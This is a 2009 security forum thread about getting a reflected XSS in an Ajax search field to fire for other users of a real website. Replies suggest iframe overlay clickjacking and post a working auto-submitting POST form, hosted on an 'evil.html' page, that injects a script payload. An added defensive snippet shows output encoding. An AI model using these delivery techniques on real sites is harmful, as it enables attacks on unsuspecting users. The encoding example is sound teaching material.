Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Basic XSS question
Posted by: Gobo
Date: June 09, 2009 10:53AM

I have found a website with an XSS vulnerability in a field that can't be accessed from a URL like the example below:

www.example.com/search.php?a=xssHere

The XSS vulnerability only works if I manually type in the script into the field.
How do I make it possible to link others to a page with the XSS included (submitted)?

When the search button is clicked, the page gets updated with the search data from a 'call_ajax' function, so the page doesn't get refreshed. Is this still exploitable?



Edited 1 time(s). Last edit at 06/09/2009 11:01AM by Gobo.

Re: Basic XSS question
Posted by: Anonymous User
Date: June 09, 2009 11:54AM

Try working with images - the browser will attempt to load them even if the content came in via Ajax providing you load and error events.

Re: Basic XSS question
Posted by: Gobo
Date: June 09, 2009 01:18PM

.mario Wrote:
-------------------------------------------------------
> Try working with images - the browser will attempt
> to load them even if the content came in via Ajax
> providing you load and error events.

I think you misunderstood me. My problem is not with finding an XSS vector, it's with somehow getting that XSS'd page to display for other users. My problem is that the search field can't be submitted from the URL like a normal XSS attack where a crafted URL is given to a victim (shown in my example), so I'm looking for alternatives.



Edited 1 time(s). Last edit at 06/09/2009 01:18PM by Gobo.

Re: Basic XSS question
Posted by: Gareth Heyes
Date: June 09, 2009 01:28PM

@Gobo

Try using an iframe to the target site and overlaying the target area, then social engineering to click the button. I presume the button is activated with a JavaScript event rather than a POST or GET action. You need to be able to provide content, either stored or reflected in some form, to conduct an attack.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Basic XSS question
Posted by: PaPPy
Date: June 09, 2009 03:04PM

Ignore my post below; I was dumb and didn't read everything about the Ajax.

-------

Are you talking about POST vs. GET?

See if you can see what the search value is, and set it in the URL. That sometimes works.
ex: hxxp://site.com/search.php?s="><script>alert(1);</script>

Or you can set up a free site somewhere and do an automatic form submission:
<body onload="document.forms.form1.submit()">
<form name="form1" method="post" action="http://site.com/search.php">
<input type="hidden" name="search" value='"><script>alert(1);</script>'>
<input type="submit">
</form>

Then send them the URL to your free site:
http://freesite.com/evil.html

And boom, they are XSSed.


I hope that's what you are trying to do.

http://www.xssed.com/archive/author=PaPPy/



Edited 2 time(s). Last edit at 06/09/2009 03:06PM by PaPPy.

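An added example, not from any poster in this thread, showing the defender's side of the discussion: the HTML fragment a search endpoint hands back to a call_ajax()-style handler, written once without output encoding and once with it, checked against the thread's `<script>` payload and an image-event payload. Function names and payloads are constructed for the illustration.

```javascript
// Added example (not from any poster in this thread). Function and payload
// names are constructed for the illustration.

// Minimal HTML entity encoder for element content and quoted attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Vulnerable: echoes the query straight into the fragment, so whatever the
// user submitted (typed by hand, or pushed in by an auto-submitted POST form)
// becomes markup once the client does results.innerHTML = fragment.
function renderSearchUnsafe(query, hits) {
  const items = hits.map((h) => `<li>${h}</li>`).join("");
  return `<p>Results for "${query}":</p><ul>${items}</ul>`;
}

// Hardened: encode every untrusted value for the HTML context it lands in.
// How the value arrived (GET, POST, Ajax) does not matter; the output context does.
function renderSearchSafe(query, hits) {
  const items = hits.map((h) => `<li>${escapeHtml(h)}</li>`).join("");
  return `<p>Results for "${escapeHtml(query)}":</p><ul>${items}</ul>`;
}

// Constructed payloads: the <script> one from the thread, which browsers do
// not execute when inserted via innerHTML, and an image-event one, which they do.
const PAYLOADS = [
  '"><script>alert(1);</script>',
  '<img src=x onerror=alert(1)>',
];

// True when the fragment still carries a raw <script> or <img> tag.
function containsRawTag(fragment) {
  return /<(script|img)\b/i.test(fragment);
}

// Runs both renderers over each payload; unsafe -> true, safe -> false.
function demo() {
  return PAYLOADS.map((p) => ({
    unsafe: containsRawTag(renderSearchUnsafe(p, ["result"])),
    safe: containsRawTag(renderSearchSafe(p, ["result"])),
  }));
}
```

Both payloads survive the unsafe renderer as live markup and come out of the safe one as inert text, which is why the fix belongs at the output context rather than at the transport.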
Re: Basic XSS question
Posted by: Kyo
Date: June 10, 2009 11:16AM

http://wocares.com/pf3.php

Re: Basic XSS question
Posted by: bobku
Date: February 16, 2010 09:48AM

Gobo have you managed to include the script in that page?

I have a similar problem where everything works fine just when introduced manually.

The link doesn't change when the <script> is added to the Search; it has javascript:executeSearch().

Thx.



Edited 1 time(s). Last edit at 02/16/2010 09:51AM by bobku.
